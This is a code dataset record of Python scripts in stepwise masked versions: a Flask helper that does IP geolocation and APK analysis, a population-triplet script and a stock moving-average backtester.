os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path,\n picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n current_app.logger.info(apk_info)\n if type == 1:\n pass\n elif type == 2:\n pass\n return apk_info\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-4": "import base64\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nimport traceback\nimport zipfile\nfrom datetime import datetime\nimport requests\nfrom flask import request, current_app\nfrom library.oss import oss_upload_monkey_package_picture\nfrom public_config import TCLOUD_FILE_TEMP_PATH\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n target_path = '/tmp/packages/'\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n download_apk_name = os.path.join(target_path, target_name)\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url,\n download_apk_name))\n response = requests.get(url=apk_download_url, verify=False)\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n time.sleep(0.5)\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, '下载失败'\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n package_info_re = re.compile(\n \"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\"\n , re.I)\n label_icon_re = re.compile(\"application: label='(.+)'.*icon='(.+)'\"\n , re.I)\n launchable_activity_re = re.compile(\n \"launchable-activity: name='(.+)'.*label.*\", re.I)\n apk_info = {}\n cmd = '/usr/local/bin/aapt dump badging {}'.format(\n download_apk_name)\n command_process = subprocess.Popen(cmd, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.STDOUT)\n infos = command_process.stdout.readlines()\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n try:\n size = round(os.path.getsize(download_apk_name) / float(\n 1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n if not os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path,\n picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n current_app.logger.info(apk_info)\n if type == 1:\n pass\n elif type == 2:\n pass\n return apk_info\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport base64\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nimport traceback\nimport zipfile\nfrom datetime import datetime\n\nimport requests\nfrom flask import request, current_app\n\nfrom library.oss import oss_upload_monkey_package_picture\nfrom public_config import TCLOUD_FILE_TEMP_PATH\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n\n url = 'http://api.map.baidu.com/location/ip'\n params = {\"ip\": ip, \"ak\": 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n\n if ret and 'status' in ret and ret['status'] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n # type 1 : not save , 2: save to db\n target_path = \"/tmp/packages/\"\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n\n download_apk_name = os.path.join(target_path, target_name)\n\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url, download_apk_name))\n\n response = requests.get(url=apk_download_url, verify=False)\n\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n\n time.sleep(0.5)\n # 下载失败\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, \"下载失败\"\n\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n\n package_info_re = re.compile(r\"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\", re.I)\n label_icon_re = re.compile(r\"application: label='(.+)'.*icon='(.+)'\", re.I)\n launchable_activity_re = re.compile(r\"launchable-activity: name='(.+)'.*label.*\", re.I)\n\n apk_info = {}\n\n cmd = '/usr/local/bin/aapt dump badging {}'.format(download_apk_name)\n\n command_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n infos = command_process.stdout.readlines()\n\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n\n try:\n size = round(os.path.getsize(download_apk_name) / float(1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n\n if not os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path, picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n\n current_app.logger.info(apk_info)\n\n if type == 1:\n pass\n elif type == 2:\n pass\n\n return apk_info\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import sys
import itertools as it
pop_list = []
#with open("/Users/dashazhernakova/Documents/Doby/GenomeRussia/ancientDNA/GR+Lazaridis.ind") as f:
with open(sys.argv[1]) as f:
[pop_list.append(l.strip().split("\t")[2]) for l in f if l.strip().split("\t")[2] not in pop_list]
triplets = it.combinations(pop_list, 3)
for a,b,c in triplets:
print a + "\t" + b + "\t" + c + "\tMbuti.DG"
|
normal
|
{
"blob_id": "de7cd231aceb2700acb3ecafe36d1ba1f5c1643b",
"index": 6191,
"step-1": "#!/usr/bin/python\nimport sys\nimport itertools as it\n\npop_list = []\n\n#with open(\"/Users/dashazhernakova/Documents/Doby/GenomeRussia/ancientDNA/GR+Lazaridis.ind\") as f:\nwith open(sys.argv[1]) as f:\n\t[pop_list.append(l.strip().split(\"\\t\")[2]) for l in f if l.strip().split(\"\\t\")[2] not in pop_list]\n\ntriplets = it.combinations(pop_list, 3)\nfor a,b,c in triplets:\n\tprint a + \"\\t\" + b + \"\\t\" + c + \"\\tMbuti.DG\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from datareader import *
import matplotlib.pyplot as plt
from plotting import *
from misc import *
import leastSquares as lsModel
import masim as mAvgSim
import numpy as np
import pandas as pd
import statistics as stat
from datetime import datetime as dt
from time import mktime
def main():
# scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',
# start='2019-09-16',end='2020-11-12')
# cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)
# cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')
# df_stock = pd.read_csv('603131.csv')
# df_cypt = pd.read_csv('LINK-USD.csv')
# df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')
# sim = mAvgSim.movingAverageSim(df_stock)
# sim = mAvgSim.movingAverageSim(df_cypt)
# net,num_trades,test_error = sim.run_simulation(ndays=15)
# sim.plot_graph()
# test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)
daily_signal_checker('china_stocks.csv',location='chineseStocks/')
# update_open_close('china_stocks.csv',location='chineseStocks/')
# tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)
# df_stock = tmp.read_csv('chineseStocks/')
# open_price = tmp.get_today_open()
# df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
# sim = mAvgSim.movingAverageSim(df_stock)
# sim.run_simulation(ndays=5)
# signals = sim.produce_buy_sell(ndays=1)
# print(signals)
def update_portfolio():
portfolio = pd.read_csv(portfolio)
def daily_signal_checker(stocks,location):
ndays=6
# Get updated stock prices (whole csv)
# scrape_data(pd.read_csv(stocks),location='chineseStocks/',
# start='2019-09-16',end='2020-11-24')
# Run through stock list to get opens and predict
stock_list = pd.read_csv(stocks)
for code in stock_list['Code']:
tmp = backtest_database(code,'2019-09-16','2020-11-18',1)
df_stock = tmp.read_csv(location=location)
open_price = float(tmp.get_today_open())
# print(code)
print(open_price)
df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
sim = mAvgSim.movingAverageSim(df_stock)
signals = sim.produce_buy_sell(ndays=ndays)
print("Company:",code,
"Signals:",signals)
def scrape_data(stock_list,location,start,end):
for code in stock_list['Code']:
print("Got Code:",code)
tmp = backtest_database(code,start,end,1)
tmp.create_csv(location=location)
def test_stock_list(stock_list,location,ndays):
returns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])
for code in stock_list['Code']:
print(code)
df_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)
sim = mAvgSim.movingAverageSim(df_stock)
net,num_trades,test_error = sim.run_simulation(ndays=ndays)
if num_trades == 0:
continue
returns = returns.append({
'Company' : code,
'No. Trades' : num_trades,
'Net return' : net,
'Test Error' : test_error
},ignore_index=True)
# print('Company:',code,'\n Number of Trades',num_trades,'\n Net % return',net)
print("Mean Test Error = ", np.mean(returns['Test Error']))
net_profit = np.sum(returns['Net return'])
companies_traded = len(returns)
mean = stat.mean(returns['Net return'])
std = stat.stdev(returns['Net return'])
print("Net Profit =",net_profit,
'\n Total number of companies traded =',companies_traded,
'\n Mean Profit =',mean,
'\n Standard Deviation',std)
print(returns)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "8d5e652fda3fb172e6faab4153bca8f78c114cd1",
"index": 7973,
"step-1": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\n<mask token>\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\n<mask token>\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\ndef update_portfolio():\n portfolio = pd.read_csv(portfolio)\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from datareader import *\nimport matplotlib.pyplot as plt\nfrom plotting import *\nfrom misc import *\nimport leastSquares as lsModel\nimport masim as mAvgSim\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nfrom datetime import datetime as dt\nfrom time import mktime\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\ndef update_portfolio():\n portfolio = pd.read_csv(portfolio)\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from datareader import *\nimport matplotlib.pyplot as plt\nfrom plotting import *\nfrom misc import *\nimport leastSquares as lsModel\nimport masim as mAvgSim\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nfrom datetime import datetime as dt\nfrom time import mktime\n\ndef main():\n\t# scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',\n\t# \t\t\t\t\t\tstart='2019-09-16',end='2020-11-12')\n\t# cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)\n\t# cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')\n\t# df_stock = pd.read_csv('603131.csv')\n\t# df_cypt = pd.read_csv('LINK-USD.csv')\n\t# df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')\n\t# sim = mAvgSim.movingAverageSim(df_stock)\n\t# sim = mAvgSim.movingAverageSim(df_cypt)\n\t# net,num_trades,test_error = sim.run_simulation(ndays=15)\n\t# sim.plot_graph()\n\t# test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)\n\tdaily_signal_checker('china_stocks.csv',location='chineseStocks/')\n\t# update_open_close('china_stocks.csv',location='chineseStocks/')\n\t# tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)\n\t# df_stock = tmp.read_csv('chineseStocks/')\n\t# open_price = tmp.get_today_open()\n\t# df_stock = df_stock.append({'Open' : open_price},ignore_index=True)\n\t# sim = mAvgSim.movingAverageSim(df_stock)\n\t# sim.run_simulation(ndays=5)\n\t# signals = sim.produce_buy_sell(ndays=1)\n\t# print(signals)\n\ndef update_portfolio():\n\tportfolio = pd.read_csv(portfolio)\n\ndef daily_signal_checker(stocks,location):\n\tndays=6\n\t# Get updated stock prices (whole csv)\n\t# scrape_data(pd.read_csv(stocks),location='chineseStocks/',\n\t# \t\t\t\t\t\tstart='2019-09-16',end='2020-11-24')\n\t# Run through stock list to get opens and predict\n\tstock_list = pd.read_csv(stocks)\n\tfor code in stock_list['Code']:\n\t\ttmp = backtest_database(code,'2019-09-16','2020-11-18',1)\n\t\tdf_stock = tmp.read_csv(location=location)\n\t\topen_price = float(tmp.get_today_open())\n\t\t# print(code)\n\t\tprint(open_price)\n\t\tdf_stock = df_stock.append({'Open' : open_price},ignore_index=True)\n\t\tsim = mAvgSim.movingAverageSim(df_stock)\n\t\tsignals = sim.produce_buy_sell(ndays=ndays)\n\t\tprint(\"Company:\",code,\n\t\t\t\"Signals:\",signals)\n\ndef scrape_data(stock_list,location,start,end):\n\tfor code in stock_list['Code']:\n\t\tprint(\"Got Code:\",code)\n\t\ttmp = backtest_database(code,start,end,1)\n\t\ttmp.create_csv(location=location)\n\ndef test_stock_list(stock_list,location,ndays):\n\treturns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])\n\tfor code in stock_list['Code']:\n\t\tprint(code)\n\t\tdf_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)\n\t\tsim = mAvgSim.movingAverageSim(df_stock)\n\t\tnet,num_trades,test_error = sim.run_simulation(ndays=ndays)\n\t\tif num_trades == 0:\n\t\t\tcontinue\n\t\treturns = returns.append({\n\t\t\t'Company' : code,\n\t\t\t'No. Trades' : num_trades,\n\t\t\t'Net return' : net,\n\t\t\t'Test Error' : test_error\n\t\t},ignore_index=True)\n\t\t# print('Company:',code,'\\n Number of Trades',num_trades,'\\n Net % return',net)\n\tprint(\"Mean Test Error = \", np.mean(returns['Test Error']))\n\tnet_profit = np.sum(returns['Net return'])\n\tcompanies_traded = len(returns)\n\tmean = stat.mean(returns['Net return'])\n\tstd = stat.stdev(returns['Net return'])\n\tprint(\"Net Profit =\",net_profit,\n\t\t'\\n Total number of companies traded =',companies_traded,\n\t\t'\\n Mean Profit =',mean,\n\t\t'\\n Standard Deviation',std)\n\tprint(returns)\n\n\nif __name__ == \"__main__\":\n\tmain()\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.